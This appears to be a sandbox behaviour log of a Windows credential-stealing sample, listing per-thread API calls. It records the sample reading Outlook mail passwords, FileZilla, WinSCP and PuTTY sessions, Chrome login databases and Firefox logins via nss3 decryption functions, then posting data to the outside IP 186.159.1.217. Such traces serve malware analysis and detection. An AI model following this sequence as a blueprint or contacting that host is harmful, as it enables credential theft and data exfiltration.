Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Email, type = REG_BINARY	2	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Server, type = REG_BINARY	2	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Port, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, type = REG_BINARY	2	Fn Data
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Password, type = REG_BINARY	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP Server, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Server, type = REG_BINARY	2	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Port, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Password, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = HTTP Server, type = REG_NONE	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = Email, type = REG_NONE	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\95a84a5145e1b7428591aa8b63570f22	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\95a84a5145e1b7428591aa8b63570f22	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\98abf245da169742aaaaf5b0bdd4dea8	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\98abf245da169742aaaaf5b0bdd4dea8	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\adf5b6e3c063d3459407b9def7e90514	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\adf5b6e3c063d3459407b9def7e90514	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c5d2c4710d70ab4c8917b715c91bcb5a	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c5d2c4710d70ab4c8917b715c91bcb5a	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ce1460b2d4cad64e96fa40180c6297a9	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ce1460b2d4cad64e96fa40180c6297a9	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\fdd8a1fc7778114da9ed4f04391d9dea	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\fdd8a1fc7778114da9ed4f04391d9dea	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = Email, type = REG_NONE	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	2	Fn
DNS	Resolve Name	host = 186.159.1.217, address_out = 186.159.1.217	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Connect	remote_address = 186.159.1.217, remote_port = 8082	1	Fn
Module	Get Handle	module_name = c:\windows\system32\urlmon.dll, base_address = 0x76850000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 421, size_out = 421	1	Fn Data
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)	1	Fn
Inet	Open Connection	protocol = http, server_name = 186.159.1.217, server_port = 80	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP/1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/81/	1	Fn
Inet	Send HTTP Request	headers = Accept: /, User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3), Host: 186.159.1.217, Connection: close, Content-Type: multipart/form-data; boundary=---------XOJSXTJFMZPLETZX, Content-Length: 230, url = 186.159.1.217/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/81/	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 230, size_out = 230	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 4096, size_out = 139	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 4096, size_out = 0	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
System	Sleep	duration = 30000 milliseconds (30.000 seconds)	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\filezilla\recentservers.xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\filezilla\sitemanager.xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions	1	Fn

Thread 0x788

Category	Operation	Information	Count	Logfile
System	Sleep	duration = 30000 milliseconds (30.000 seconds)	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak, type = file_attributes	1	Fn
File	Create	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak, size = 100, size_out = 100	1	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak-journal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak-wal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak, size = 2048, size_out = 2048	1	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak-journal, type = file_attributes	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak, size = 16, size_out = 16	1	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak-wal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak, size = 2048, size_out = 2048	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, type = file_attributes	1	Fn
File	Create	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 100, size_out = 100	1	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-journal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-wal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 2048, size_out = 2048	4	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-journal, type = file_attributes	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 16, size_out = 16	1	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-wal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 2048, size_out = 2048	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, type = file_attributes	1	Fn
File	Create	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 100, size_out = 100	1	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-journal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-wal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 2048, size_out = 2048	4	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-journal, type = file_attributes	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 16, size_out = 16	1	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-wal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 2048, size_out = 2048	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, type = file_attributes	1	Fn
File	Create	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 100, size_out = 100	1	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-journal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-wal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 2048, size_out = 2048	4	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-journal, type = file_attributes	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 16, size_out = 16	1	Fn Data
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-wal, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, size = 2048, size_out = 2048	1	Fn Data

Thread 0x74c

Category	Operation	Information	Success	Count	Logfile
System	Get Info	type = Operating System		1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2		1	Fn

Thread 0x7d0

Category	Operation	Information	Count	Logfile
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command, data = "C:\Program Files\Mozilla Firefox\firefox.exe", type = REG_SZ	1	Fn
Module	Load	module_name = nss3.dll, base_address = 0x722a0000	1	Fn
Module	Get Address	module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x7235d70b	1	Fn
Module	Get Address	module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x7235d13c	1	Fn
Module	Get Address	module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x722f3c51	1	Fn
Module	Get Address	module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_NeedLogin, address_out = 0x7230542b	1	Fn
Module	Get Address	module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_GetTokenName, address_out = 0x722f39df	1	Fn
Module	Get Address	module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x722dd3ca	1	Fn
Module	Get Address	module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x722dcbc4	1	Fn
Module	Get Address	module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x722f00a7	1	Fn
Module	Get Address	module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x722f3333	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	1	Fn
File	Create	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\Mozilla\Firefox\Profiles\azpxkq2q.default\logins.json, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn

Thread 0xd04

Category	Operation	Information	Count	Logfile
System	Get Time	type = Ticks, time = 11064230	1	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064246	1	Fn
System	Sleep	duration = 3 milliseconds (0.003 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064261	1	Fn
System	Sleep	duration = 6 milliseconds (0.006 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064277	1	Fn
System	Sleep	duration = 9 milliseconds (0.009 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064292	1	Fn
System	Sleep	duration = 12 milliseconds (0.012 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064308	1	Fn
System	Sleep	duration = 15 milliseconds (0.015 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064324	1	Fn
System	Sleep	duration = 18 milliseconds (0.018 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064370	1	Fn
System	Sleep	duration = 21 milliseconds (0.021 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064402	1	Fn
System	Sleep	duration = 24 milliseconds (0.024 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064433	1	Fn
System	Sleep	duration = 27 milliseconds (0.027 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064464	1	Fn
System	Sleep	duration = 30 milliseconds (0.030 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064495	1	Fn
System	Sleep	duration = 33 milliseconds (0.033 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064542	1	Fn
System	Sleep	duration = 36 milliseconds (0.036 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064589	1	Fn
System	Sleep	duration = 39 milliseconds (0.039 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064636	1	Fn
System	Sleep	duration = 42 milliseconds (0.042 seconds)	1	Fn
System	Get Time	type = Ticks, time = 11064682	1	Fn
System	Sleep	duration = 45 milliseconds (0.045 seconds)	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	2	Fn
DNS	Resolve Name	host = 186.159.1.217, address_out = 186.159.1.217	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Connect	remote_address = 186.159.1.217, remote_port = 8082	1	Fn
Module	Get Handle	module_name = c:\windows\system32\urlmon.dll, base_address = 0x76850000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 421, size_out = 421	1	Fn Data
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)	1	Fn
Inet	Open Connection	protocol = http, server_name = 186.159.1.217, server_port = 80	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP/1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/83/	1	Fn
Inet	Send HTTP Request	headers = Accept: /, User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3), Host: 186.159.1.217, Connection: close, Content-Type: multipart/form-data; boundary=---------ODANMVDCLOFFUEBV, Content-Length: 286, url = 186.159.1.217/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/83/	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 286, size_out = 286	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 4096, size_out = 139	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 4096, size_out = 0	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
